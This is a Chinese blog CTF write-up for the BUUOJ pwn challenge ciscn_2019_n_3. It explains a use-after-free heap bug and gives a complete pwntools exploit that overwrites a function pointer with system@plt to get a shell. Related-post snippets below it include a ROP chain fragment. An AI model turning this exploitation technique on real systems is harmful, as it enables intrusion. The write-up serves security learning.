[BUUOJ] ciscn_2019_n_3

最新推荐文章于 2024-04-14 00:09:22 发布
最新推荐文章于 2024-04-14 00:09:22 发布
阅读量1.7k 收藏
点赞数
分类专栏: BUU OJ pwn 文章标签: pwn BUUOJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41706924/article/details/102250897
版权

这里写自定义目录标题

漏洞点

可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞:
ALT

漏洞利用

由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。
我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指针指向system@plt,可以getshell

#0号堆块 (string)0xc 0x38
#1号堆块(int) 0xc
我们释放0和1号堆块,再申请0xc大小的string的堆块
#2号堆块 (string) 0xc 0xc
此时原本0号堆块的存放print和free指针的堆块已经可以被我们修改,直接修改为“dash”加system的地址。之所以在前面加dash是因为我们会多输入一个‘\x0a’即换行符导致指针会指向dash处。

exp

from pwn import *

p = process("./ciscn_2019_n_3")
context.log_level = 'debug'
context.arch = 'x86'
rmt = "node2.buuoj.cn.wetolink.com"
port = 28717
p = remote(rmt,port)
elf = ELF("ciscn_2019_n_3")
def newnote(idx,type,value,length=0):
    p.recvuntil("CNote > ")
    p.sendline(str(1))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
    p.recvuntil("Type > ")
    p.sendline(str(type))
    if type == 1:
        p.recvuntil("Value > ")
        p.sendline(str(value))
    else:
            p.recvuntil("Length > ")
            p.sendline(str(length))
            p.recvuntil("Value > ")
            if length == 8:
                p.send(value)
            else:
                p.sendline(value)
def delnote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(2))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
def shownote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(3))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
if __name__ == "__main__":
    newnote(0,2,'a'*10,0x88)
    newnote(1,2,'a'*10,0x38)
    #gdb.attach(p)
    newnote(2,1,0x41)
    #newnote(2,2,'b'*10,0x38)
    delnote(1)
    delnote(2)
    newnote(3,2,'bash'+p32(elf.plt['system']),0xc)
    #gdb.attach(p)
    newnote(4,2,"/bin/sh\x00",0x38)
    delnote(1)

    p.interactive()
Joaus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 9634
2023全国大学生信息安全竞赛(ciscn)部分题解
cmcc_simplerop
01-07
io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I',...
buuoj N种方法解决 writeup
m0_73605862的博客
05-22 256
Step2:将文件放到winhex下查看二进制码会不会有线索,发现ASCII码上面写了是jpg的图片,并且用了base64编码,所以猜测后面的字符串经历了base64编码,并且文件尾有==,证实了猜测。【来源】(buuoj)https://buuoj.cn/challenges#N%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3%E5%86%B3。Step4:扫描二维码得到flag,在线网页为:https://scanqr.org/【题目】N种方法解决。
【CTF】ciscn_2019_n_1和pwn1_sctf_2016--栈溢出
最新发布
qq_48201589的博客
04-14 268
BUUICTF的ciscn_2019_n_1和pwn1_sctf_2016--栈溢出类型解题思路
ciscn_2019_s_3
qq_45691294的博客
12-29 2131
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2208
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1608
buuctf ciscn_2019_ne_5题目分析
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
java外贸网站源码-buuoj:浮标
06-05
C/C++/Java/Python2/Python3和Swift5.1语言 支持 Special Judge和选择题判题 丰富的API,开放的源代码 一键保存和导出代码模板 支持类似LeetCode的模板题判题功能 新增班级管理与布置作业功能 现代化的界面 + 手机...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 434
[buuctf]ciscn_2019_n_8
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 611
ciscn_2019_n_8
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1130
ciscn2023华中赛区pwn
buuoj 基础破解 writeup
m0_73605862的博客
05-22 340
Step3:打开txt文件,发现一串字符串,猜测是base64编码,放到在线网页下解密,得到flag。Step2:根据题目提示密码是四位数字,将加密的文件放到archpr下进行暴力破解,选择暴力破解,数字,最大长度和最小长度都是4位数字。【来源】(buuoj)https://buuoj.cn/challenges#%E5%9F%BA%E7%A1%80%E7%A0%B4%E8%A7%A3。Step1:根据题目提示,加上下载的加密zip。【思路】暴力破解然后base64解码。
buuoj部分web题解
Lionel_kai的博客
09-01 1699
1.[HCTF 2018]WarmUp 没有什么提示,直接f12查看源码:发现有一个source.php的网站,尝试直接打开 http://be5d60aa-bc86-4414-8225-92ff9f8e70f8.node4.buuoj.cn:81/source.php 打开发现是一段php代码: 审计代码发现: mb_substr(str1,start,[length][,[str2]]):是在str1从start开始length为长度截取字符串,str2是表示字符编码 mb_str...
[CISCN 2019 初赛]Love Math 1
shinygod的博客
03-21 719
知识点:各个函数嵌套,进制转换 00x1 这题过滤了很多比如:参数长读为80以下,且里面只能是数学函数,以及一些字符。 我们可以用变量拼接,那么如何拼接呢?我们可以看一下下面这个函数,里面可以有36进制,也就是说我们可以得到任意小写字母,那么我们就可以尝试构造_GET,但是这需要大写字母,而在php中有个hex2bin可以把16进制转换为字符串,可以通过hex2bin来构造_GET。且hex2bin可以这么构造base_convert(37907361743,10,36),意思是把37907361743转
ctf【ciscn_2019_n_8】
HUANGliang_的博客
10-29 220
缓冲区溢出漏洞
2019ciscn_s_3
Hyrink的博客
06-07 431
ciscn_s_3的两种解法:SROP & ret2csu详解
wireshark buuoj
10-19
Wireshark是一款网络协议分析...而buuoj是一个CTF平台,提供了各种各样的CTF题目,包括网络安全、二进制安全、密码学等等。在CTF比赛中,Wireshark可以帮助选手分析网络流量,找到有用的信息,解决一些网络安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值